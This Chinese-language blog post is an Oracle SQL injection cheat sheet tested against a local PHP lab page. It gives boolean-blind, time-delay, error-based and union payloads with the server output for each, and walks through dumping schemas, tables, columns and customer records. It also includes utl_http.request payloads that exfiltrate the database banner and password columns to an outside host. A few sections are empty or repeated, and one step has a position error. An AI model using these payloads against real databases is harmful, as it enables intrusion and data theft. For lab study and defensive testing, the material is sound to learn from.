type
Post
status
Published
date
May 25, 2023
slug
summary
tags
category
渗透测试
icon
password
常用函数LENGTH() 长度计算函数SUBSTR() SUBSTR() 延时注入utl_inaddr.get_host_name( ) 报错注入utl_http.request 外带注入逻辑盲注[and or]1.逻辑是否成立判断注入是否存在?2.获取数据库长度[length()]3.获取数据库名[substr]:3.获取数据库名[substr&&ascii]4.获取数据库的表名5.延时注入[]联合注入 [union]1.判断列数[order by]2.联合注入查询连接用户名[user]3.查询数据库用户[sys_context]4.获取当前数据库的版本5.查询数据库6.查询数据库表名7.查询数据表下的列名8.查询数据列下的详细数据:
常用函数
LENGTH() 长度计算函数
# 当AND两边逻辑相等时,则知道数据库长度,比如,15=左边值时,数据库长度为15 1 and 15=(SELECT LENGTH(table_name) from user_tables where rownum=1)
SUBSTR()
68=((select ascii(substr(table_name,1,1)) from user_tables WHERE rownum=1))
SUBSTR() 延时注入
1=(select decode(substr(user,1,1),'T',dbms_pipe.receive_message('RDS',5),0) from dual) dbms_pipe.receive_message('o',5),0)
utl_inaddr.get_host_name( ) 报错注入
1=utl_inaddr.get_host_name((select user from dual)) 1=ctxsys.drithsx.sn(1,(select user from dual)) (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null dbms_xdb_version.checkin() and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null-- bms_xdb_version.makeversioned() and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null -- dbms_xdb_version.uncheckout() and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null -- dbms_utility.sqlid_to_sqlhash() and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null -- ordsys.ord_dicom.getmappingxpath() and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)-- decode() and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --
utl_http.request 外带注入
utl_http.request('http://192.168.1.2:6666/'%7c%7c(select banner from sys.v_$version where rownum=1))=1
utl_http.request('http://192.168.1.2:6666/'%7c%7c(SELECT CONCAT("name","password") FROM STU where rownum=1))=1
逻辑盲注[and or]
1.逻辑是否成立判断注入是否存在?
逻辑成立时,回显数据
http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=1
Id:1 Name:admin Age:11
逻辑不成立时,数据为空(或者回显的数据较少)。
http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
2.获取数据库长度[length()]
当长度小于24时,有数据回显, 而小于23时,回显为空, 那么数据库总数量为:23
读取数据库的总数量:23 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (select count(distinct(owner)) from sys.all_tables)<24 | Id:1
Name:admin
Age:11 |
ㅤ | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (select count(distinct(owner)) from sys.all_tables)<23 | ㅤ |
获取当前数据库长度 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (length((select nvl(cast(user as varchar(4000)),chr(32)) from dual)))=6 | Id:1
Name:admin
Age:11 |
3.获取数据库名[substr]:
读取当前数据库名第1个字符:S | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1))='S' | Id:1
Name:admin
Age:11 |
读取当前数据库名第2个字符:Y | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),2,1))='Y' | Id:1
Name:admin
Age:11 |
… | … | … |
读取到当前数据库名称:SYSTEM
3.获取数据库名[substr&&ascii]
读取当前数据库名第1个字符:S | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)))=83 | Id:1
Name:admin
Age:11 |
读取当前数据库名第2个字符:Y | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),2,1)))=89 | Id:1
Name:admin
Age:11 |
读取当前数据库名第3个字符:S | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substr((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)))=83 | Id:1
Name:admin
Age:11 |
… | … | … |
4.获取数据库的表名
4.1.1、直接计算数据表的总数量:
方法1:
直接计算长度:157 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner='SYSTEM')=157 | Id:1
Name:admin
Age:11 |
4.1.2、利用SUBSTR()函数猜表的第1、2、3位数:
http://127.0.0.1/oracle_inject/oracle.php?id=1
(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),1,1))=1 | Id:1
Name:admin
Age:11 | |
ㅤ | http://127.0.0.1/oracle_inject/oracle.php?id=1
(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),2,1))=5 | Id:1
Name:admin
Age:11 |
ㅤ | http://127.0.0.1/oracle_inject/oracle.php?id=1
(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),3,1))=7 | Id:1
Name:admin
Age:11 |
4.1.3、利用ASSIC()和SUBSTR()函数猜第1、2、3位的对应ASSIC码:
十进制:49
对应的ASCII码:
1 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),1,1))=49) | Id:1
Name:admin
Age:11 |
十进制:53
对应的ASCII码:
5 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),2,1))=53) | Id:1
Name:admin
Age:11 |
十进制:55
对应的ASCII码:
7 | http://127.0.0.1/oracle_inject/oracle.php?id=1
and (ascii(substrc((select nvl(cast(count(table_name) as varchar(4000)),chr(32)) from sys.all_tables where owner=chr(83)||chr(89)||chr(83)||chr(84)||chr(69)||chr(77)),3,1))=55) | Id:1
Name:admin
Age:11 |
4.2
4.2
4.2
4.2
5.
延时注入[]
联合注入 [union]
1.判断列数[order by]
# 数量<=可显示列数时,数据正常回显
http://172.20.176.1/oracle_inject/oracle.php ?id=1 order by 4--+
Id:1 Name:admin Age:11
# 数量>可现实列数时,数据无法回显。(报错则是常见的回显)
http://172.20.176.1/oracle_inject/oracle.php ?id=1 order by 10--+
Warning: oci_execute(): ORA-01785: ORDER BY item must be the number of a SELECT-list expression in E:\4-phpEnvironment\PhpStudy\PHPTutorial\WWW\Oracle_inject\oracle.php on line 19 Warning: oci_fetch_row(): ORA-24374: define not done before fetch or execute and fetch in E:\4-phpEnvironment\PhpStudy\PHPTutorial\WWW\Oracle_inject\oracle.php on line 20
当前order by的列数:4。
2.联合注入查询连接用户名[user]
查询用户名 | http://172.20.176.1/oracle_inject/oracle.php
?id=1 union select null,user,null,null from dual-- | Id:1
Name:admin
Age:11
Id:
Name:SYSTEM
Age: |
当前连接用户名:SYSTEM
3.查询数据库用户[sys_context]
查询数据库用户 | http://172.20.176.1/oracle_inject/oracle.php?id=1
union select null,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),null,null from dual-- | Id:1
Name:admin
Age:11
Id:
Name:SYSTEM
Age: |
当前用户:SYSTEM
4.获取当前数据库的版本
查询用户名 | http://172.20.176.1/oracle_inject/oracle.php?id=1
union select null,(select banner from sys.v_$version where rownum=1),null,null from dual-- | Id:1
Name:admin
Age:11
Id:
Name:Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
Age: |
5.查询数据库
注意:表名查询时,一定要用大写。查询数据库的总数量:
23 | http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,('~'||(select count(distinct(owner)) from sys.all_tables)||'~'),null,null from dual-- | Id:
Name:~23~
Age: |
查询数据库第一个库名:
APEX_030200 | http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=1)),null,null from dual--+ | Id:
Name:APEX_030200
Age: |
查询数据库第二个库名:
APPQOSSY | http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,((select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit=2)),null,null from dual--+ | Id:
Name:APPQOSSYS
Age: |
6.查询数据库表名
查询表名总数量 | http://172.20.176.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,('~'||(select count(1) from sys.all_tables where owner='OE')||'~'),null,null from dual--+ | Id:
Name:~10~
Age |
查询数据库中的第一个表 | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union select null, (select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='OE')) where limit=1), null, null from dual--+ | Id:
Name:CUSTOMERS
Age: |
查询数据库中的第二个表 |
http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union select null, (select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='OE')) where limit=2), null, null from dual--+ | Id:
Name:INVENTORIES
Age: |
以此类推,可以枚举出所有的10的表名。
7.查询数据表下的列名
查询表下列数的总数量:
15 | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union all select null,('~'||(select count(1) from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')||'~'),null,null from dual--+ | Id:
Name:~15~
Age: |
查询数据表下的第一列:
CUSTOMER_ID | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union all select null,(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')) where limit=1),null,null from dual--+ | Id:
Name:CUSTOMER_ID
Age: |
查询数据表下的第二列:
CUST_FIRST_NAME | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union all select null,(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='OE' and table_name='CUSTOMERS')) where limit=2),null,null from dual--+ | Id:
Name:CUST_FIRST_NAME
Age: |
8.查询数据列下的详细数据:
查询字段为:CUST_LAST_NAME、CUSTOMER_ID、ACCOUNT_MGR_ID
查询表下列数的总数量:
319 | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,('~'||(select count(1) from OE.CUSTOMERS)||'~'),null,null from dual--+ | Id:
Name:~319~
Age: |
查询OE数据库下的CUSTOMERS表第一列数据: | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,(select '~'||CUST_LAST_NAME||'~'||CUSTOMER_ID||'~'||ACCOUNT_MGR_ID||'~' from (select CUST_LAST_NAME,CUSTOMER_ID,ACCOUNT_MGR_ID,rownum as limit from OE.CUSTOMERS) where limit=1),null,null from dual--+ | Id:
Name:~Kanth~240~145~
Age: |
查询OE数据库下的CUSTOMERS表第二列数据: | http://127.0.0.1/oracle_inject/oracle.php?id=1 and 1=2
union select null,(select '~'||CUST_LAST_NAME||'~'||CUSTOMER_ID||'~'||ACCOUNT_MGR_ID||'~' from (select CUST_LAST_NAME,CUSTOMER_ID,ACCOUNT_MGR_ID,rownum as limit from OE.CUSTOMERS) where limit=2),null,null from dual--+ | Id:
Name:~Broderick~241~145~
Age: |
- 作者:轻言易梦
- 链接:https://hexo.xslover.xyz/article/0afb0101-6c28-4f2c-b725-dea1918d9f2f
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
